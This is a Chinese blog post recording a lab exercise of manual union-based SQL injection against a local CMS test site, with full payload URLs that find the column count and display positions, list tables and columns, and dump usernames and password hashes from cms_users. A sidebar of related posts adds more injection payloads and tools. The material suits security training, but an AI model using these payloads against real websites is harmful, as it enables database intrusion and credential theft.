实验——SQL注入

最新推荐文章于 2024-04-05 22:03:02 发布
最新推荐文章于 2024-04-05 22:03:02 发布
阅读量383 收藏 4
点赞数
分类专栏: 实验 漏洞类型 文章标签: sql 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44870846/article/details/107625644
版权

目标系统:cms网站

操作工具:hackbar

判断是否有回显

根据变换id,数据库中的内容是否回显在网页中判断

http://192.168.6.134/cms/show.php

?id=33

http://192.168.6.134/cms/show.php

?id=34

判断数据库是否有报错

在id后加单引号

判断是字符型还是数字型

给id加单引号,提交之后有错误提示

当错误提示中参数左右有单引号和双引号时为字符型

当数字参数左右两边没有引号时就为数字型

 

该网站错误中没有数字参数显示出,为数字型。

判断是否有布尔类型状态

http://192.168.6.134/cms/show.php

?id=34 and 1=2

1=2为假,新闻内容不显示,证明有布尔类型状态

判断列数

利用order by进行判断,当根据第16列进行排序时,页面显示有错误,得出有15列

判断显示位

http://192.168.6.134/cms/show.php

?id=34 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()

判断第3和11个字段是显示位

输出数据库的名字

http://192.168.6.134/cms/show.php

?id=34 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()

查询所有的表名

http://192.168.6.134/cms/show.php

?id=34 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,table_name,12,13,14,15 from information_schema.tables where table_schema=database()

字段编码不同出现问题的解决方法

hex(group_concat(table_name)):将该字段转换成十六进制,结果再转为字符串得到所有表。

 

http://192.168.6.134/cms/show.php

?id=34 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,hex(group_concat(table_name)),

12,13,14,15 from information_schema.tables where table_schema=database()

获取字段名

获得cms_users中的字段名

http://192.168.6.134/cms/show.php

?id=34 and 1=2 union select 1,2,database(),4,5,6,7,8,9,10,hex(group_concat(column_name)),

12,13,14,15 from information_schema.columns where table_name="cms_users"

获得字段内容

http://192.168.6.134/cms/show.php

?id=34 and 1=2 union select 1,2,group_concat(username),4,5,6,7,8,9,10,group_concat(password),

12,13,14,15 from cms_users

MD5解密

 

善良的女同学
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
啊D——SQL注入工具
12-01
啊D注入工具
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
kali Liunx 利用漏洞注入——SQL注入
Sword_of_despair的博客
11-19 393
和其他示例一样,命令注入漏洞是由于输入验证机制不佳,以及使用用户提供的数据来形成字符串,这些字符串可能将用作操作系统的命令。20.下面维续猜解后面的字符,在结果中,你可能会发现%的结果总为 trme,这是因为%是通配符,它可以和任意一个字符匹配到。如果想要获得用户名和密码,就像在前面的小节中所做的那样,需要知道具有这些信息的表的名称。我们的载荷列表是a-&,1-9,和所有特殊符号的集合。应用程序会对上传的文件进行安全检查,当然,安全检查的手段是多种多样的,常见的是对后缀名的检查和。
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
weixin_46838716的博客
03-04 1652
算机网络安全基础知识5:sql注入漏洞攻击,DVWA演示sql注入漏洞,如何利用sql注入查看数据库信息,sqlmap,sql注入漏洞的防御
网络安全---SQL注入攻击
最新发布
zdsxc_的博客
04-05 988
容器通常是一次性的,因此一旦被销毁,容器内的所有数据都会丢失。对于此次实验,我们确实希望将数据保留在 MySQL 数据库中,确保我们在关闭容器时,我们不会丢失工作。为此,我们将主机上的mysql_data文件夹(在 MySQL 容器运行后,在Labsetup文件夹内创建)装载(mounted)到MySQL容器内的 /var/lib/mysql 文件夹中。mysql_data文件夹是 MySQL 存储其数据库的地方。因此,即使容器被销毁,数据库中的数据仍保留。
网络安全实验sql注入实验(一)
qq_64314976的博客
06-23 803
通过实验学习到SQL注入的基本操作以及使用SQL注入得到数据库里面的用户名和密码等等,刚开始不知道如何从Web服务器向数据访问层发送SQL请求,后来通过同学交流才得以解决。本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明;本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明;本例任务:尝试进行sql注入,目标为得到数据库中的用户名与密码,并对你的sql注入测试语句及简单说明。实例二、节约是种美德,少用空格。
DVWA-WEB漏洞系列之SQL注入
woo233的博客
08-09 3286
用户输入数据为 1’ and 1=1#,这时SQL语句发生变化,在原有查询完成后会判断 1=1,如果判断正确则才会有输出[#作用是注释(移除)后续SQL语句]在用户输入中依次增加order by后面的数据,当在输入为 1’ order by 3#时网页出现报错,证明该数据库有2列/字段。攻击者在HTTP请求中注入恶意的SQL代码,服务器使用参数构建数据库SQL命令时,恶意SQL被一起构造,并在数据库中执行。防御SQL注入:使用PDO,配合正确的过滤和sql语句就可避免SQL注入漏洞的产生。...
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
09-19
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
PHP——SQL注入测试靶场
05-27
利用PHP写的SQL注入靶场。可参考博客 https://blog.csdn.net/realmels/article/details/117338077
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
sql注入攻击实验
05-25
sql注入攻击,先自己搭建一个网站,链接数据库必须用Sa链接
超级SQL注入工具【SSQLInjection】V1.0 正式版 20200209.zip
05-26
一款基于HTTP协议自组包的SQL注入工具,工具采用C#开发,直接操作TCP会话来进行HTTP交互,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入;支持以盲注、错误显示、Union注入等方式来获取数据;里含教程地址
正方教务系统新版sql注入漏洞利用工具
01-19
相信研究过正方教务系统的朋友看到过网上传播的比较多的一篇文章提的/service.asmx中的BMCheckPassword存在注入,然而现在大多数正方教务已经将BMCheckPassword移除了,导致漏洞无法利用。本人研究了/service.asmx中的其它接口,发现zfcwjk1存在同样的注入漏洞,特将注入方法写成工具供大家学习参考。 zfcwjk1似乎是一个财务类的确认接口,利用起来稍微麻烦点,需要一个目标学校的任意学号。 程序执行后,会需要用户输入三个参数。分别是: 1.目标网址 2.目标学校的任意学号 3.年份(估计是用来确定这个学号所在年份的情况,随便填个2012或者2013,不行再换) 若提示“cannot access target url”则可能是目标网址填错了或者教务系统已经将/service.asmx移除了,如果是/service.asmx被移除的话漏洞就没法再利用了。 另外,若是校内网使用则建议挂代理。。。
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 1630
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一篇博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
SQL注入非常详细总结
热门推荐
dreamthe的博客
05-25 1万+
个人觉得还是很详细,对你一定帮助。也是我自己花了不少时间总结的。
mysql手工注入
karain123的博客
05-26 298
//判断前缀与后缀 数字与字符型  'order by 1#      'and 's' IN ('swords')#      数字型   order by 1#   //前缀为空,后缀为#   数字与字符 ')order by 1#    ')&& 's' IN ('swords')#   //很少见  ")order by 1#
seedlab实验——SQL注入攻击
Yang254176的博客
07-24 1854
一、实验目的 通过SQL注入攻击,掌握网站的工作机制,认识到SQL注入攻击的防范措施, 加强对Web攻击的防范。 二、实验原理 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。简单的说就是在post/ge
sql注入实验
我了解豹女就像农民伯伯了解大米
02-24 1365
实验目的 使学员了解SQL注入的原理和利用方法 实验内容 实验靶机URL:http://10.110.2.145:8008/ 通过手工注入获取admin账户的密码 实验过程进行截图,要求必须要有payload和结果截图 实验过程截图 SQL手工注入 http://10.110.2.145:8008/article.php?id=1 and 1=1 #有回显 http://10.110.2.145:8008/article.php?id=1 and 1=2 #无...
如何进行sql注入实验
05-22
请注意,SQL注入是一种非法的网络攻击行为,可能会对他人造成损害。在进行SQL注入实验之前,请务必获得合法的授权,并且仅在授权范围内进行操作。 如果您已经获得了合法授权,可以按照以下步骤进行SQL注入实验: 1. 找到一个目标网站,该网站使用了动态生成SQL语句的方式来访问数据库。您可以使用搜索引擎或者其他方式来寻找这样的网站。 2. 使用工具或手动构造SQL注入语句,向目标网站提交恶意请求。注入语句的目的是通过数据库查询操作,获取未授权的数据或者执行非法的操作。例如,您可以使用以下注入语句来获取管理员账号的密码: ``` SELECT password FROM users WHERE username='admin' OR 1=1;-- ``` 这个注入语句中的 `OR 1=1` 条件将始终为真,导致查询结果包括所有用户的密码信息。 3. 分析注入结果,确认是否成功获取了未授权的数据或者执行了非法操作。如果成功,您可以尝试利用这些数据或者操作进行更进一步的攻击行为。 请注意,进行SQL注入实验可能会导致目标网站受到攻击或者损失,因此请务必在授权范围内进行操作,并且遵守相关法律法规。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值